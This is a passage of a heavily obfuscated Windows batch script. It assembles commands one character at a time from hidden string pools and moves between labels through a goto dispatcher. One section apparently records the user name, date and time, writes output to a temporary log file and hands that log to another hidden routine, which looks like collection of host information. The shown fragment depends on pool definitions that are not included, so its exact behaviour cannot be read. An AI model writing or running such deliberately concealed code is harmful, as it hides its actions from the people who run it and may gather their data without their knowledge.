set "v_c_I0_0Oll0OO=!v_l_ll__O0000_!"
set /a "v_i_IlOl__=(49+1)"
for /f "tokens=2 delims==" %%I in ('set v_i_IlOl__') do call set "v_l_IO0Olll00I=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c___II_0O_lO=!v_l_IO0Olll00I!"
set /a "v_i__Ol0OO=((47+12)+(23-23))"
for /f "tokens=2 delims==" %%I in ('set v_i__Ol0OO') do call set "v_l___0llllOOO=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IOlIl0_I0I=!v_l___0llllOOO!"
set /a "v_i_I0OI_I=(((2*4)+1)+15)"
set "v_p_O0I0lOlI_O=v_l_IOIOl00Il_"
for /f "tokens=2 delims==" %%I in ('set v_i_I0OI_I') do for /f "delims=" %%A in ("!v_p_O0I0lOlI_O!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__l0I__OI0I=!v_l_IOIOl00Il_!"
set /a "v_i__0lIlI=(((-20+48)*2)+1)"
set "v_p_l0l__0OO0O=v_l_ll__0O0llI"
for /f "tokens=2 delims==" %%I in ('set v_i__0lIlI') do for /f "delims=" %%A in ("!v_p_l0l__0OO0O!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lIO_llIl0I=!v_l_ll__0O0llI!"
set /a "v_i_I_Ol0I=(((((0*5)+2)*5)*4)+1)"
set "v_p___l0Ill_00=v_l____0_Ol_l0"
for /f "tokens=2 delims==" %%I in ('set v_i_I_Ol0I') do for /f "delims=" %%A in ("!v_p___l0Ill_00!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_II0l00OOl_=!v_l____0_Ol_l0!"
set /a "v_i__0IllO=(24+38)"
set "v_p_OIO_OlIl0O=v_l_O_00I_ll_O"
for /f "tokens=2 delims==" %%I in ('set v_i__0IllO') do for /f "delims=" %%A in ("!v_p_OIO_OlIl0O!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_IIIOIIlO0_=!v_l_O_00I_ll_O!"
set /a "v_i_O00I0I=((((0*2)*5)+3)+25)"
for /f "tokens=2 delims==" %%I in ('set v_i_O00I0I') do call set "v_l_OlII_l_0_l=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__0_II0__Il=!v_l_OlII_l_0_l!"
set /a "v_i_lOI0OI=(((39-12)*3)-31)"
set "v_p_O0lII_0__0=v_l_OOll0IlI_I"
for /f "tokens=2 delims==" %%I in ('set v_i_lOI0OI') do for /f "delims=" %%A in ("!v_p_O0lII_0__0!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OI0__OOIl_=!v_l_OOll0IlI_I!"
set /a "v_i____l00=((((3*4)*5)+2)+(24-24))"
for /f "tokens=2 delims==" %%I in ('set v_i____l00') do call set "v_l_lIlIOOIOO0=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__000__O_l_=!v_l_lIlIOOIOO0!"
call !m_IOO0_O0llI! "v_f_lO_O00I_I_OI=!v_c_OOlII_O0_O!!v_c___l00I_OOl!"
call !m_IOO0_O0llI! "v_f_I0000_00llI0=!v_c_OI_I0_0IO_!!v_c___l00I_OOl!"
call !m_IOO0_O0llI! "v_f_Olll_Ill0OI_=!v_c__II0O__II0!!v_c__l0_0I0IIl!"
call !m_IOO0_O0llI! "v_f_II__l00Ol0I0=!v_c_OOO_OI0O__!!v_c_O_I_l_l0I_!"
call !m_IOO0_O0llI! "v_f_O___OI_0O0_O=!v_c_IO_0I0II00!!v_c__0OIOll0OO!"
call !m_IOO0_O0llI! "v_f__l0III0l__0_=!v_c_II_0_IOlO_!!v_c__OI0I0lII0!!v_c__OO00_lI_0!"
call !m_IOO0_O0llI! "v_f__lllO_O_0III=!v_c_O_OOI00Il0!!v_c_OI0__OOIl_!"
call !m_IOO0_O0llI! "v_f__llOI_OlOO0l=!v_c___II_0O_lO!!v_c_IIl0llII00!!v_c_II_0_IOlO_!"
call !m_IOO0_O0llI! "v_f__0_IOlIOII_I=!v_c_llO_O0lIOO!!v_c_l00OII0_l0!"
call !m_IOO0_O0llI! "v_f_O0_0llI_lI_l=!v_c_OOl0_0Il__!!v_c_O_IlOI_l_0!!v_c__OO00_lI_0!"
call !m_IOO0_O0llI! "v_f_IOI0_I_I00I_=!v_c_Ol__I_l_II!!v_c_O_0_0l0O0I!"
call !m_IOO0_O0llI! "v_f_OO0OO000lIO_=!v_c__II0O__II0!!v_c_llO_O0lIOO!!v_c_l00OII0_l0!"
call !m_IOO0_O0llI! "v_f_I0O_lI_0__0_=!v_c_OOO_OI0O__!!v_c_OI0__OOIl_!"
call !m_IOO0_O0llI! "v_f_IIIOOOI_0IO0=!v_c_II_0_IOlO_!!v_c_II0O0lO00I!"
set "v_s_I000OII_l0=!v_l_l_0OIO00Il!"
:L_DISPATCH
for /f "delims=" %%A in ("!v_s_I000OII_l0!") do goto :%%A
:LB_EXIT_II0_0lOO
exit /b
:I0lO_lO_II00
call !m__l_lII_0I_!
call !m_IOO0_O0llI! "v_s_I000OII_l0=!v_l_II_0llII_I!"
goto :L_DISPATCH
:Il_I0IO0II_O
for /f "delims=" %%A in ("!p2_O0_0I0_I_0!") do for /f "delims=" %%B in ("!%%A!") do for /f "delims=" %%C in ("!%%B!") do %%C  !v_f__lllO_O_0III!!v_c_lO_OOIOOl_!!v_c_OOlII_O0_O!!v_c_lll_O_0OI_!!v_c_lI0l0OI0ll!!v_c_O_0_0l0O0I!!v_c_l__IlIOII0!!v_c___l00I_OOl!!v_c_lIO_I_____! %USERNAME%
for /f "delims=" %%A in ("!p2_O0_0I0_I_0!") do for /f "delims=" %%B in ("!%%A!") do for /f "delims=" %%C in ("!%%B!") do %%C  !v_f__llOI_OlOO0l!!v_c_O_0_0l0O0I!!v_c__0l__0lI_I!!v_c_lIO_I_____! %DATE% %TIME%
call !m_IOO0_O0llI! "!v_c_IO_0I0II00!!v_c_IllOlOOl0l!!v_c__l0IIII00O!!v_c_lOOlOIOIl0!!v_c__0_O00OlOO!!v_c_OOl0_IO0O_!!v_c_II0l00OOl_!!v_c_O0lO_OIlI0!=%temp%!v_c_lll_lll0OO!!v_c_IO0___lIll!!v_c_O_I_l_l0I_!!v_f__0_IOlIOII_I!!v_c_lO_IO00lOl!!v_c_lO_OOIOOl_!!v_f_O0_0llI_lI_l!!v_c_IO0___lIll!!v_c_l_0_I0I_lI!!v_c_IO0___lIll!"
for /f "delims=" %%A in ("!p2_O0_0I0_I_0!") do for /f "delims=" %%B in ("!%%A!") do for /f "delims=" %%C in ("!%%B!") do %%C  !v_c_IlO0_II00O!!v_c_II0O0lO00I! !v_f_IOI0_I_I00I_!!v_c_lOO0___II0! !v_c_IO0___lIll!!v_f_OO0OO000lIO_! !v_c_IlIl0_IOI0!!v_c_OOl0_0Il__!!v_c_O0_I0l0_I_!!v_c_I00OlIIO_l!!v_c_lll_O_0OI_!!v_c_llO_O0lIOO!!v_c_O_0_0l0O0I!!v_c___l_0OO00l!!v_c___l00I_OOl!!v_c_lOO0___II0! > "%TEMP_LOG%"
call !m__IO0I__Il0! !v_c_OOl0_IO0O_!!v_c_OOl0_0Il__!!v_c_O0__lIO__l! !v_c_IIO0OOl__O!!v_c_OOl0_0Il__!!v_c_llO_O0lIOO!!v_c_I00OlIIO_l!!v_c_IIl0llII00!!v_c_llO_O0lIOO!!v_c___l00I_OOl! !v_c__0OIOll0OO!!v_f_I0O_lI_0__0_!!v_c_O0_I0l0_I_!!v_c_IlIIOlO_l_!!v_c_OI0__OOIl_!!v_f_IIIOOOI_0IO0!!v_c_OOO_OI0O__!!v_c_IlIl0_IOI0!!v_c_II0O0lO00I!!v_c_I0O0_000O_! %TEMP_LOG%
call !m_IOO0_O0llI! "v_s_I000OII_l0=!v_l_O0OO_IllII!"
goto :L_DISPATCH
:l_000O0_0_Ol
for /f "delims=" %%A in ("!p2_IlII_0l0lO!") do for /f "delims=" %%B in ("!%%A!") do for /f "delims=" %%C in ("!%%B!") do %%C
call !m_IOO0_O0llI! "v_s_I000OII_l0=!v_l_I00O__Il_O!"
goto :L_DISPATCH
:lI0OOl000OII
for /f "delims=" %%A in ("!p2__lIlIlI00_!") do for /f "delims=" %%B in ("!%%A!") do for /f "delims=" %%C in ("!%%B!") do %%C  !v_c_O00_I__I_O!!v_c_O_0_0l0O0I!!v_c_llO_O0lIOO!!v_c_IlIIOlO_l_!!v_c__II0O__II0!!v_c__l0_0I0IIl! !v_c_I0l00IlOIO!!v_c_OllOOOOOO0!!v_c_IIl0llII00!!v_f_lO_O00I_I_OI!!v_c_l_0l0IlOOI! !v_c_I0l00IlOIO!!v_c_IIIOIIlO0_!!v_c_IIl0llII00!!v_c_l__IlIOII0!ı
call !m__IO0I__Il0! !v_f_I0000_00llI0!!v_c_O0_I0l0_I_!!v_c_IO0___lIll!!v_f_Olll_Ill0OI_! !v_c_IlO0_II00O!!v_c___l00I_OOl!!v_c_OOO_OI0O__!!v_c__l_0_O0Ol0!!v_c___l00I_OOl!!v_f_II__l00Ol0I0!!v_c_IIIOIIlO0_!!v_c___l00I_OOl! !v_f_O___OI_0O0_O!!v_c__IOO_O_OO_!!v_c_lO_OOIOOl_!!v_c_IlOOlIO_O_!!v_c_lI0l0OI0ll!!v_c_O_0_0l0O0I!!v_c_II__O0I0OO!!v_c_OOl0_0Il__!!v_f__l0III0l__0_!!v_c__OO00_lI_0!
call !m_IOO0_O0llI! "v_s_I000OII_l0=!v_l_Ol_0O0O_00!"
goto :L_DISPATCH
